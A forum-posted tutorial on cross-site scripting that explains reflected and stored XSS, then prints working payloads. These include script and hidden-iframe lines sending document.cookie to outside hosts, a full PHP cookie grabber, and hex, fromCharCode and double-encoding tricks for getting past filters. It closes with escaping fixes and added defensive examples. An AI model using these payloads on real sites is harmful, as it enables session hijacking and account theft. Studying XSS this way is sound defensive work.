Dragos

About Cross Site Scripting (XSS)


About Cross Site Scripting

Author: Synthesis

Website: www.rstcenter.com

1. Introduction

This article is dedicated to a web vulnerability called Cross Site Scripting. The examples throughout the article are written in Cascading Style Sheets (CSS), HyperText Markup Language (HTML), PHP: Hypertext Preprocessor (PHP), JavaScript (JS) and Visual Basic Script (VBScript).

2. Definition

Cross Site Scripting (abbreviated XSS) is a web vulnerability that allows a user to inject a script of their own into a web page. That script then runs in the browsers of the other users who view the infected page (a client-side vulnerability). This vulnerability is dangerous only when the code affects cookies or sessions.

2.1 About cookies

A cookie is a piece of text, often encrypted, that a server sends to a web browser. The browser stores the cookie and sends it back unchanged whenever the user accesses that server again.

Overall, a cookie can be viewed as a key for logging on to that server. Cookies are usually created after the user has logged on to a site.

After stealing a cookie from the victim, the attacker can use it to authenticate on the site with the victim's identity. Cookies can be read easily from JavaScript.

A cookie grabber is mostly used to capture cookies. The cookie grabber is a script that receives the victim's cookies through GET and stores them in a database.

2.2 Types of XSS

There are two types of XSS.

2.2.1 Non-persistent XSS

Non-persistent XSS (also known as reflected or temporary XSS) affects the user only while he accesses the infected page. This type of XSS is the most common.

Let's take a site's search engine as an example. In some cases, when it doesn't find what the user requested, it displays a message like <?php echo $_GET['q']; ?> was not found. Because the search engine displays the user's input unfiltered, we can enter various code to infect the page.

2.2.2 Persistent XSS

Persistent (also called stored or permanent) XSS is an XSS that is stored by the site. It is the most dangerous type because the script is entered once and affects the other users for as long as it remains on the page.

Most often, we find persistent XSS on sites that display the latest searches.

3. How does an XSS occur?

An XSS occurs when input is not filtered (or is filtered wrongly). Most of the time the page reads a variable through GET and then displays its value in the browser. XSS via POST also exists, but it is slightly more difficult to exploit.

4. Exploiting an XSS through GET

Let's consider the following code:

<form action="" method="GET">
<input type="text" value="" name="text">
<input type="submit" value="Search">
</form>
<?php
echo stripslashes($_GET['text']);
?>

The code above is a form with a text box and a button. After you write something in the input box and click the Search button, the form sends the information to the PHP code as yourpage.php?text=InformationFromForm, and the code displays it.

How can we exploit this form?

4.1 Inserting a JavaScript code in the form

JavaScript is an object-oriented programming language used to add different features to a web page. JavaScript has the advantage that it runs on your own computer, inside the browser, rather than on the server.

In the form above, we can insert any JavaScript code. The script will be executed as soon as we hit the Search button. For example, if we insert the code below into the form, the browser will display an alert box with the text Message.

<script language="JavaScript">alert("Message")</script>

4.1.1 Cookie grabber

As I said earlier, a cookie can be stolen using a cookie grabber.

In order to steal a cookie, the attacker must redirect the victim to his cookie grabber. In this case we can use document.location:

<script language="JavaScript">document.location="http://www.site.com/cookiegrabber/index.php?victimcookie="+document.cookie;</script>

Now, how does a cookie grabber work? Easy! The PHP code takes the information through GET (victimcookie in the example above) and saves it in a database.

A cookie grabber example for the code above:


<?php
/* Cookie Grabber Example */

// MySQL database connection
$host = 'localhost';
$name = 'root';
$password = 'password';
$database = 'database1';

// Connecting to the database (the mysql_* extension used here was removed in PHP 7)
$connect = mysql_connect($host, $name, $password) or die(mysql_error());
mysql_select_db($database) or die(mysql_error());

// Taking the cookie using GET
$cookie = isset($_GET['victimcookie']) ? $_GET['victimcookie'] : '';

// Victim's referer ($HTTP_REFERER only worked with register_globals; read it from $_SERVER)
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Conditional statements
if ($cookie == "") {
    header('Location: http://www.google.com/'); // If the page is accessed with an empty GET parameter, redirect to Google
} else {
    mysql_query("INSERT INTO Cookies (Cookie, Link) VALUES ('$cookie','$referer')"); // Insert the cookie and the referer into the database
    mysql_close($connect); // Close the database connection
    header('Location: http://www.google.com/'); // Redirect the user to Google
}
?>

There is a chance that the victim notices the link is not quite right and does not open it. No problem: we can use an iframe instead:

<iframe src="http://site.com/script.php?text=<script>document.location.href='http://server2.com/grabber.php?cookie='+escape(document.cookie)</script>" width="0" height="0"></iframe>

4.2 Inserting a VBScript code in the form

VBScript is a scripting language created by Microsoft, which underlies ASP. VBScript runs only in the Internet Explorer browser.

To display the same alertbox as above we write the following code in the form and click the Search button:

<script language="VBScript">MsgBox "Message"</script>

4.3 Inserting a CSS code in the form

CSS is used for formatting HTML documents.

The CSS code below displays the same alert box with the text Message (as above).

<style type="text/css">body{background-image: url('javascript:alert("Message");');}</style>

XSS using CSS is old and works only on older browsers such as Internet Explorer 6.

4.4 Ways to encode your personal script

There are several ways to encode your script so that it can be placed in a vulnerable form. Three known methods are shown below.

4.4.1 Hexadecimal

Hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols 0–9 to represent values zero to nine, and A, B, C, D, E, F (or alternatively a through f) to represent values ten to fifteen.

Sometimes, when information is submitted to a form (search form, login form, etc.), the script checks whether the submitted information contains certain strings such as "<script>", "alert", "document.location", "window.location" or others.

We can replace these strings with their hexadecimal values. The PHP function below converts any string to hexadecimal.


<?php
// Returns the hexadecimal representation of every byte of $sir (the input string)
function code_hex($sir)
{
    $hex = '';
    for ($i = 0; $i < strlen($sir); $i++)
    {
        $hex .= sprintf('%02x', ord($sir[$i])); // two digits per byte, zero-padded
    }
    return $hex;
}
?>

4.4.2 Unicode

Unicode is a standard for encoding text so that it can be stored and interpreted consistently.

It is used to encode JavaScript scripts. Below is a JavaScript function that uses charCodeAt to turn a string into an equivalent String.fromCharCode(...) expression built from its character codes.


<script type="text/javascript">
// Builds a String.fromCharCode(...) expression from the character codes of the input
function encode_Unicode(string)
{
    if (string == "")
    {
        alert('The string can not be empty.');
        return "";
    }
    var syn = "String.fromCharCode(";
    for (var i = 0; i < string.length; i++)
    {
        syn += string.charCodeAt(i) + ",";
    }
    syn = syn.substring(0, syn.length - 1); // drop the trailing comma
    syn += ")";
    return syn;
}
</script>

4.4.3 Double Encoding

This method consists of encoding the code twice in order to bypass security filters or to execute certain commands.

We can bypass the security filters because the server decodes the information only once. The second round of decoding is done by backend platforms or modules that usually have no security checks.

This technique is used not only for XSS, but also for other types of web attacks such as LFI and RFI.

Let's consider the following JavaScript code:


<script>alert("Message")</script>

First, we URL-encode the HTML characters, writing each one as % followed by its hexadecimal value.


%3Cscript%3Ealert%28%22Message%22%29%3C%2Fscript%3E

The character that marks a double encoding is %, which is itself represented in hexadecimal as %25. So we replace the % of every encoded HTML character with %25. The code becomes:


%253Cscript%253Ealert%2528%2522Message%2522%2529%253C%252Fscript%253E
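To make the encoding steps above concrete, and to show why a filter that decodes only once is fooled, here is an added example in JavaScript (Node.js). It is not code from the original article; the percent-encoder, the bounded "decode until stable" canonicalisation, the block list and the two filter functions are all constructed for this demonstration, as is the sample payload.

```javascript
// Added example (not from the original article): single and double
// percent-encoding of the article's payload, and a filter that decodes
// once versus one that canonicalises its input first.

// Encode every byte that is not an unreserved URL character as %XX.
// Unlike encodeURIComponent, this also encodes ( ) ' ! * so the output
// matches the single-encoded form shown in the article.
function percentEncode(s) {
  return Array.from(Buffer.from(s, 'utf8'))
    .map((b) => {
      const ch = String.fromCharCode(b);
      return /[A-Za-z0-9\-_.~]/.test(ch)
        ? ch
        : '%' + b.toString(16).toUpperCase().padStart(2, '0');
    })
    .join('');
}

// Double encoding: the % of every %XX sequence is itself encoded as %25.
function doubleEncode(s) {
  return percentEncode(percentEncode(s));
}

// Decode repeatedly until the value stops changing (bounded). A defender
// wants to check the fully decoded text, because that is what the backend
// eventually sees, not what the web server handed the filter after one pass.
function canonicalize(s, maxRounds = 5) {
  let current = s;
  for (let round = 0; round < maxRounds; round++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch (e) {
      break; // malformed %-sequence: stop and keep what we have
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current;
}

// Constructed block list in the spirit of the article's filter description.
const BLOCKLIST = ['<script', 'javascript:', 'vbscript:'];

function containsBlocked(s) {
  const lower = s.toLowerCase();
  return BLOCKLIST.some((needle) => lower.includes(needle));
}

// Naive filter: decodes the parameter once (as the web server does) and checks.
function naiveFilterBlocks(rawParam) {
  return containsBlocked(decodeURIComponent(rawParam));
}

// Hardened filter: canonicalises first, so a second layer of encoding
// cannot hide the payload from the check.
function hardenedFilterBlocks(rawParam) {
  return containsBlocked(canonicalize(rawParam));
}

// Stand-alone demo with a constructed sample payload.
const demoPayload = '<script>alert("Message")</script>';
console.log('single:', percentEncode(demoPayload));
console.log('double:', doubleEncode(demoPayload));
console.log('naive filter blocks double-encoded input:', naiveFilterBlocks(doubleEncode(demoPayload)));
console.log('hardened filter blocks double-encoded input:', hardenedFilterBlocks(doubleEncode(demoPayload)));
```

The naive filter passes the double-encoded form because after one decoding round the text still reads %3Cscript, not <script. Canonicalising before the check closes that gap; the bound on decoding rounds keeps a string of many nested %25 layers from becoming a denial-of-service vector.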

4.5 Other ways to exploit an XSS

There are many methods for exploiting an XSS.

4.5.1 XSS using IMG tag


<IMG SRC=javascript:alert("Message");>
<IMG SRC=vbscript:msgbox("Message");>

4.5.2 XSS imported from another site


<SCRIPT SRC=http://www.site.com/xss.js></SCRIPT>

The file xss.js contains:


alert ("Message");

4.5.3 Malformed HTML tags


<IMG src="""><SCRIPT>alert("Message")<%2FSCRIPT>">

5. Methods to protect ourselves from XSS

XSS can be fixed easily.

PHP provides two functions that do the same thing for this purpose: htmlentities and htmlspecialchars. These functions convert special characters like "<", ">", "&" and quotes into HTML entities, so the browser displays the text as-is instead of executing the injected code.

Let's add one of these functions to the form above:

<form action="" method="GET">
<input type="text" value="" name="text">
<input type="submit" value="Search">
</form>
<?php
// Encode the input for the HTML context before echoing it; ENT_QUOTES also converts single quotes
$text = isset($_GET['text']) ? $_GET['text'] : '';
echo htmlentities(stripslashes($text), ENT_QUOTES, 'UTF-8');
?>
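The same fix, shown from the defender's side in JavaScript (Node.js) as an added example that is not part of the original article: an escaping function equivalent to htmlspecialchars with ENT_QUOTES, the article's "was not found" page rendered unsafely and safely, and a separate scheme check for URLs that end up in src or href attributes, where HTML escaping alone does not stop javascript: or vbscript: URLs like the IMG examples above. The render functions, safeUrl and the sample query are all constructed for this demonstration.

```javascript
// Added example (not from the original article): output encoding for the
// HTML body/attribute context plus a URL scheme check.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#039;',
};

// Escape the five characters that let text break out of element content or
// a quoted attribute value. '&' must be escaped as well, otherwise an
// attacker can smuggle entities that the browser decodes later.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable rendering of the article's search page: input is reflected raw.
function renderSearchUnsafe(query) {
  return `<p>${query} was not found</p>`;
}

// Fixed rendering: the same page with the input escaped for the HTML context.
function renderSearchSafe(query) {
  return `<p>${escapeHtml(query)} was not found</p>`;
}

// For attacker-influenced URLs, escaping is not enough: a javascript: URL is
// still a javascript: URL after escaping. Strip control characters and
// whitespace (which browsers ignore inside a scheme), then allow only
// http, https or relative URLs. Returns null when the URL is rejected.
// Note: a relative path such as "page:1" would be read as a scheme here.
function safeUrl(u) {
  const cleaned = String(u).replace(/[\u0000-\u0020]/g, '');
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (scheme && !/^https?$/i.test(scheme[1])) return null;
  return cleaned;
}

// Stand-alone demo with a constructed query.
const sampleQuery = '<script>alert("Message")</script>';
console.log(renderSearchUnsafe(sampleQuery));
console.log(renderSearchSafe(sampleQuery));
console.log(safeUrl('javascript:alert("Message")'));
console.log(safeUrl('https://www.rstcenter.com/'));
```

Escaping is context-specific: escapeHtml is the right tool for text and quoted attribute values, while URL attributes need the scheme check and data placed inside an inline script needs JavaScript string encoding. On the cookie side, setting the session cookie with the HttpOnly attribute keeps document.cookie from exposing it to an injected script, which directly blunts the cookie-grabber technique the article describes.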

6. Ending

In this article we talked about what an XSS is, how many types of XSS there are, how an XSS can be exploited and how we can protect ourselves from XSS. If you have questions, send me an email to the address listed at the beginning.

Edited by Dragos

What happened to this article? Earlier it was a bit different, and there was also a link to a PDF of this article; I don't see that link anymore.

LE1: sry.. once again my inattention gets the better of me.... I didn't notice that the first one was in Romanian and this one is in English ....

Edited by nedo